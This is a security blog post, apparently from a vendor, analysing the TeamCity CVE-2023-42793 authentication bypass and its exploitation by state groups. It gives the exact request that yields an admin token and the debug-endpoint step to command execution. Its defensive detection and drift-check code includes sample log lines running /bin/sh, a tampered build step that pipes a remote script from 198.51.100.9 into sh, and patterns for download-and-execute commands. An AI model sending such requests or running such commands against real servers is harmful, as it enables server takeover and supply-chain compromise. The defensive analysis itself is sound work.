Vulnerability Analysis

JetBrains TeamCity CVE-2023-42793: When Your Build Server Becomes the Attack Vector

A critical authentication bypass in TeamCity allowed unauthenticated attackers to gain admin access to CI/CD servers. State-sponsored groups exploited it to compromise software supply chains.

James
Application Security Engineer
6 min read

On September 19, 2023, JetBrains disclosed CVE-2023-42793, a critical authentication bypass in TeamCity On-Premises, their self-hosted CI/CD build management server (TeamCity Cloud was not affected). The flaw let an unauthenticated attacker who could reach the web interface obtain an access token for the built-in administrator account and, from there, take full administrative control of the server. Within weeks, multiple threat actors, including state-sponsored groups attributed to Russia and North Korea, were exploiting it to compromise build environments and position themselves for supply chain attacks.

The TeamCity vulnerability was particularly alarming because it directly targeted CI/CD infrastructure. A compromised build server isn't just another breached system. It's a machine that has the access and authority to modify every piece of software it builds. In the wake of SolarWinds, the software industry was acutely aware of what happens when build infrastructure is compromised.

The Vulnerability

CVE-2023-42793 was an authentication bypass in TeamCity's web interface. The server's authentication filter excluded any request path ending in /RPC2, a leftover exemption for a legacy XML-RPC endpoint. The REST endpoint that creates user access tokens, /app/rest/users/<id>/tokens/<name>, takes the token name as its final path segment, so an unauthenticated POST to /app/rest/users/id:1/tokens/RPC2 was never challenged and returned a fresh access token for user id 1, the built-in administrator. With that token the attacker had full control of the build server: access to every build configuration and its secrets, the ability to modify pipelines to inject malicious code, access to deployment credentials stored in TeamCity, the ability to trigger builds and ship modified software, and access to the source of every connected repository. The public exploit chain went one step further, using the token to switch on an internal debug setting and then calling a debug REST endpoint to run arbitrary commands on the server host.

The vulnerability affected TeamCity On-Premises versions before 2023.05.4. It was trivial to exploit: one unauthenticated HTTP request yielded an administrator token. No special tools, no complex chains, no credentials needed.
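The bypass is worth seeing in code. The block below is an added illustration, not TeamCity's source: a simplified authentication filter with an Ant-style skip list, a token-creation route whose last path segment is caller-controlled, and the exact-path allowlist that closes the hole. The pattern list, route and handler are stand-ins assumed for the example.

```python
"""Model of the CVE-2023-42793 root cause: an authentication filter that
skips auth for any path matching an Ant-style suffix wildcard, in front of a
REST route that lets the caller choose the final path segment.
Added illustration only; the pattern list, route and handler are simplified
stand-ins for TeamCity's real components, not its code."""
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple

ADMIN_USER_ID = 1  # TeamCity's first-created user is the built-in administrator


@dataclass
class Request:
    method: str
    path: str
    authenticated: bool  # True if the caller presented a valid session or token


def _ant_match(pattern: str, path: str) -> bool:
    """Ant-style matcher: '**' spans any number of segments, '*' one segment."""
    regex = re.escape(pattern).replace(r"/\*\*/", "/(?:.*/)?").replace(r"\*", "[^/]*")
    return re.fullmatch(regex, path) is not None


# Vulnerable skip list: the "/**/RPC2" entry was meant for one legacy XML-RPC
# endpoint but matches *every* path whose last segment is RPC2.
VULNERABLE_SKIP_AUTH: List[str] = ["/**/RPC2", "/login.html", "/app/rest/server"]


def skip_auth_vulnerable(path: str) -> bool:
    return any(_ant_match(p, path) for p in VULNERABLE_SKIP_AUTH)


# Hardened skip list: exact paths only, no wildcard a caller can satisfy by
# choosing a parameter value.
FIXED_SKIP_AUTH = frozenset({"/RPC2", "/login.html", "/app/rest/server"})


def skip_auth_fixed(path: str) -> bool:
    return path in FIXED_SKIP_AUTH


# The token-creation route: the token *name* is the last path segment.
TOKEN_ROUTE = re.compile(r"^/app/rest/users/id:(\d+)/tokens/([^/]+)$")


def handle(req: Request, skip_auth: Callable[[str], bool]) -> Tuple[int, str]:
    """Run one request through the auth filter, then the token route."""
    if not req.authenticated and not skip_auth(req.path):
        return 401, "Unauthorized"
    m = TOKEN_ROUTE.match(req.path)
    if req.method == "POST" and m:
        user_id, name = int(m.group(1)), m.group(2)
        role = "admin" if user_id == ADMIN_USER_ID else "user"
        return 200, f"token:{name}:user={user_id}:{role}"
    return 404, "Not Found"


if __name__ == "__main__":
    attack = Request("POST", "/app/rest/users/id:1/tokens/RPC2", authenticated=False)
    print("vulnerable:", handle(attack, skip_auth_vulnerable))  # admin token, no auth
    print("fixed:     ", handle(attack, skip_auth_fixed))       # 401
```

The general lesson is the one the fixed list encodes: an authentication exemption must be an exact path, never a pattern that a request parameter can be shaped to satisfy.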

State-Sponsored Exploitation

The exploitation of CVE-2023-42793 by state-sponsored groups elevated it from a critical vulnerability to a national security concern.

Russian intelligence services. In December 2023, CISA, the FBI, NSA, and international partners published a joint advisory attributing exploitation of CVE-2023-42793 to SVR (Russia's Foreign Intelligence Service), the same group behind the SolarWinds attack. The advisory stated that SVR actors had been exploiting the vulnerability since September 2023 to gain access to victim networks. The SVR's interest in TeamCity was consistent with their SolarWinds playbook: compromise build infrastructure to enable supply chain attacks.

North Korean groups. In October 2023, Microsoft reported that two North Korean threat groups, Diamond Sleet and Onyx Sleet, were exploiting CVE-2023-42793. Diamond Sleet deployed a custom backdoor on compromised TeamCity hosts. Onyx Sleet created a new local administrator account on the host and used it for discovery and lateral movement.

The involvement of multiple state-sponsored groups underscored the strategic value of build infrastructure. Nation-state actors recognized that compromising a build server provided leverage far beyond the immediate target: it offered the potential to compromise every customer of the software built on that server.

Why Build Servers Are Crown Jewels

CI/CD servers like TeamCity sit at the center of the software delivery pipeline. Their compromise enables a uniquely dangerous class of attack.

Code injection at scale. A compromised build server can inject malicious code into every build it processes. If the server builds production software, the attacker can modify the software before it's shipped to customers. This is exactly the SolarWinds attack pattern.

Credential harvesting. Build servers store credentials for source repositories, artifact registries, cloud providers, deployment targets, and various integrations. These credentials are often highly privileged, with access to production environments and sensitive systems.

Source code access. Build servers have read access (and sometimes write access) to all connected source repositories. An attacker on the build server can exfiltrate source code, understand the target's architecture, and identify additional vulnerabilities.

Trust position. Organizations trust their build output. If the build server says a binary passed all checks and was built from the correct source code, deployment pipelines proceed. A compromised build server can produce malicious artifacts that pass all verification because the verification itself is compromised.

Stealth. Build servers are noisy by nature. They constantly create processes, download dependencies, run tests, and generate artifacts. Malicious activity on a build server blends into this noise, making detection difficult.

The Patching Challenge

JetBrains released the fix in TeamCity 2023.05.4 and, for organizations that could not upgrade immediately, a security patch plugin that blocked the vulnerable path. However, the usual challenges applied.

Many organizations run self-hosted TeamCity instances that require manual updates. The update process involves downtime, which requires scheduling during maintenance windows. Large organizations may have multiple TeamCity instances, some managed by IT, some by individual development teams, and some running in cloud environments.

Additionally, patching the vulnerability doesn't remediate compromises that occurred before the patch. Organizations needed to audit their TeamCity instances for indicators of compromise: unauthorized admin accounts, modified build configurations, and unexpected plugin installations.

Detecting Compromise

Signs of CVE-2023-42793 exploitation included access tokens on the administrator account that nobody on the team created (the exploit path produces one named RPC2), new administrator accounts, modified build configurations with unexpected steps, TeamCity plugins installed without authorization, the debug REST API switched on in the server's internal properties, unusual outbound connections from the TeamCity host, and changes to repository hooks or triggers.

JetBrains published guidance for investigating potential compromises. The first check was for unauthorized tokens and user accounts; in the request logs, an unauthenticated POST to the token endpoint with a path ending in /RPC2 that received a success response is direct evidence of exploitation. If either was present, the TeamCity instance should be considered compromised, and every credential stored in or reachable through TeamCity, including VCS credentials, deployment keys and agent authorization tokens, should be rotated.
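A first-pass scan for these indicators, as an added example rather than JetBrains' published tooling: it runs the three stages of the public exploit chain against HTTP request log lines and flags unexplained tokens on the administrator account. The log lines are constructed in NCSA combined format, as a Tomcat access log would record them; whether your TeamCity deployment logs requests at that layer, and under which file name, is an assumption to verify against your own setup, as is the token inventory shape.

```python
"""Indicator scan for CVE-2023-42793 exploitation over HTTP request logs and a
token inventory. Added example, not JetBrains' published tooling. Sample log
lines and tokens below are constructed; the access-log layer and the token
record shape are assumptions, not TeamCity specifics."""
import re
from typing import Dict, Iterable, List

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# The publicly documented exploit chain, in order: unauthenticated token
# creation via the /RPC2 suffix bypass, a write to the data directory (the
# property that enables the debug API travels in the request body, so only
# the URL is visible here), then command execution via the debug endpoint.
INDICATORS = [
    ("auth-bypass token creation", "POST", re.compile(r"^/app/rest/users/id:\d+/tokens/RPC2$")),
    ("admin data-dir write", "POST", re.compile(r"^/admin/dataDir\.html")),
    ("debug process execution", None, re.compile(r"^/app/rest/debug/processes(\?|$)")),
]


def scan_access_log(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return one finding per matching request; a 2xx status on the first
    indicator means a token was actually issued."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, method, path_re in INDICATORS:
            if method is not None and m["method"] != method:
                continue
            if path_re.search(m["path"]):
                findings.append({"indicator": name, "ip": m["ip"], "ts": m["ts"],
                                 "path": m["path"], "status": m["status"]})
    return findings


# Tokens the team knows about on the administrator account (constructed).
KNOWN_ADMIN_TOKENS = frozenset({"backup-job"})


def audit_tokens(tokens: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Flag tokens named RPC2 (the name the exploit path forces) and any token
    on user id 1 that nobody can account for."""
    return [t for t in tokens
            if t["name"] == "RPC2"
            or (t["user_id"] == "1" and t["name"] not in KNOWN_ADMIN_TOKENS)]


SAMPLE_LOG = """\
203.0.113.7 - - [25/Sep/2023:03:14:02 +0000] "GET /login.html HTTP/1.1" 200 4120
203.0.113.7 - - [25/Sep/2023:03:14:05 +0000] "POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 200 311
203.0.113.7 - - [25/Sep/2023:03:14:09 +0000] "POST /admin/dataDir.html?action=edit&fileName=config/internal.properties HTTP/1.1" 200 0
203.0.113.7 - - [25/Sep/2023:03:14:21 +0000] "POST /app/rest/debug/processes?exePath=/bin/sh HTTP/1.1" 200 512
10.0.0.12 - - [25/Sep/2023:03:15:00 +0000] "POST /app/rest/users/id:42/tokens/ci-deploy HTTP/1.1" 200 298
"""

SAMPLE_TOKENS = [  # constructed
    {"user_id": "1", "name": "RPC2", "created": "2023-09-25T03:14:05Z"},
    {"user_id": "1", "name": "backup-job", "created": "2023-06-01T09:00:00Z"},
    {"user_id": "1", "name": "svc", "created": "2023-09-25T03:20:44Z"},
    {"user_id": "42", "name": "ci-deploy", "created": "2023-09-25T03:15:00Z"},
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"{f['ts']} {f['ip']} {f['indicator']}: {f['path']} -> {f['status']}")
    for t in audit_tokens(SAMPLE_TOKENS):
        print("suspicious token:", t)
```

Ordinary token creation by a real user (the last sample line) does not trip the first indicator because the name is not RPC2; the token audit, not the log scan, is what catches an attacker who used the bypass token to mint a second, innocuously named one.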

Lessons for CI/CD Security

Treat build servers as critical infrastructure. Apply the same security rigor to CI/CD servers as you do to production systems. This means network segmentation, access controls, patching, monitoring, and incident response planning.

Minimize stored credentials. Use short-lived, scoped credentials instead of long-lived secrets stored in the build server. Integrate with secrets managers that provide just-in-time credential access.

Restrict network access. Build servers should not be accessible from the internet. If remote access is required, use VPN or zero-trust network access solutions.

Monitor build integrity. Implement verification that build outputs match expected baselines. Track build step modifications and alert on unauthorized changes.
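One concrete form of the build-step check, added here as an example and not a TeamCity feature: diff the current step list of a build configuration against a baseline captured at review time and alert on additions, removals, modifications, reordering and scripts that fetch and run remote content. The step record shape and the sample configurations are constructed for the example.

```python
"""Drift check for build-step definitions. Added example, not TeamCity's own
integrity tooling: compares current steps of a build configuration against a
reviewed baseline and flags additions, removals, modifications, reordering
and download-and-execute patterns. The dict shape for a step is assumed for
this example, not TeamCity's settings format."""
import hashlib
import json
import re
from typing import Dict, List, Tuple

Step = Dict[str, str]

# Heuristics for the kind of step an intruder injects into a pipeline.
SUSPICIOUS_SCRIPT = [re.compile(p, re.IGNORECASE) for p in (
    r"curl[^|\n]*\|\s*(ba)?sh\b",            # curl ... | sh
    r"wget[^|\n]*\|\s*(ba)?sh\b",
    r"base64\s+(-d|--decode)",               # decode-then-run staging
    r"powershell[^\n]*-(e|enc|encodedcommand)\b",
)]


def step_digest(step: Step) -> str:
    return hashlib.sha256(json.dumps(step, sort_keys=True).encode()).hexdigest()


def diff_steps(baseline: List[Step], current: List[Step]) -> List[Tuple[str, str]]:
    base = {s["id"]: s for s in baseline}
    cur = {s["id"]: s for s in current}
    findings: List[Tuple[str, str]] = []
    findings += [("added", sid) for sid in cur.keys() - base.keys()]
    findings += [("removed", sid) for sid in base.keys() - cur.keys()]
    findings += [("modified", sid) for sid in base.keys() & cur.keys()
                 if step_digest(base[sid]) != step_digest(cur[sid])]
    # Relative order of the surviving steps must be unchanged: a step moved
    # after signing is as dangerous as a modified one.
    if ([s["id"] for s in baseline if s["id"] in cur]
            != [s["id"] for s in current if s["id"] in base]):
        findings.append(("reordered", "*"))
    findings += [("suspicious-script", s["id"]) for s in current
                 if any(p.search(s.get("script", "")) for p in SUSPICIOUS_SCRIPT)]
    return sorted(findings)


BASELINE = [  # constructed
    {"id": "restore", "type": "shell", "script": "dotnet restore"},
    {"id": "build", "type": "shell", "script": "dotnet build -c Release"},
    {"id": "sign", "type": "shell", "script": "signtool sign /f release.pfx out/app.dll"},
    {"id": "test", "type": "shell", "script": "dotnet test"},
]

# Constructed "after" state: the build step now pulls and runs a remote
# script, and a new step slips a replacement binary in ahead of signing.
TAMPERED = [
    BASELINE[0],
    {"id": "build", "type": "shell",
     "script": "dotnet build -c Release && curl -s http://198.51.100.9/s.sh | sh"},
    {"id": "patch", "type": "shell", "script": "cp /tmp/app.dll out/app.dll"},
    BASELINE[2],
    BASELINE[3],
]

if __name__ == "__main__":
    for kind, sid in diff_steps(BASELINE, TAMPERED):
        print(f"{kind:18} {sid}")
```

The baseline has to live somewhere the build server cannot write, such as a signed file in a separate repository, and the comparison has to run outside the server; otherwise an attacker with admin on TeamCity simply updates the baseline along with the steps.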

Maintain SBOM for build infrastructure. Know exactly what software your build servers run, so you can respond immediately when vulnerabilities like CVE-2023-42793 are disclosed.

How Safeguard.sh Helps

Safeguard.sh provides an independent security layer that doesn't depend on the integrity of your build infrastructure. When your build server itself becomes the attack vector, you need verification that operates outside the compromised trust boundary. Our platform's SBOM generation, vulnerability scanning, and policy gates provide that external verification, catching the kind of supply chain modifications that a compromised build server would introduce. Continuous monitoring ensures that your software's composition is tracked independently of your CI/CD pipeline, so a build server compromise doesn't silently propagate through your supply chain.
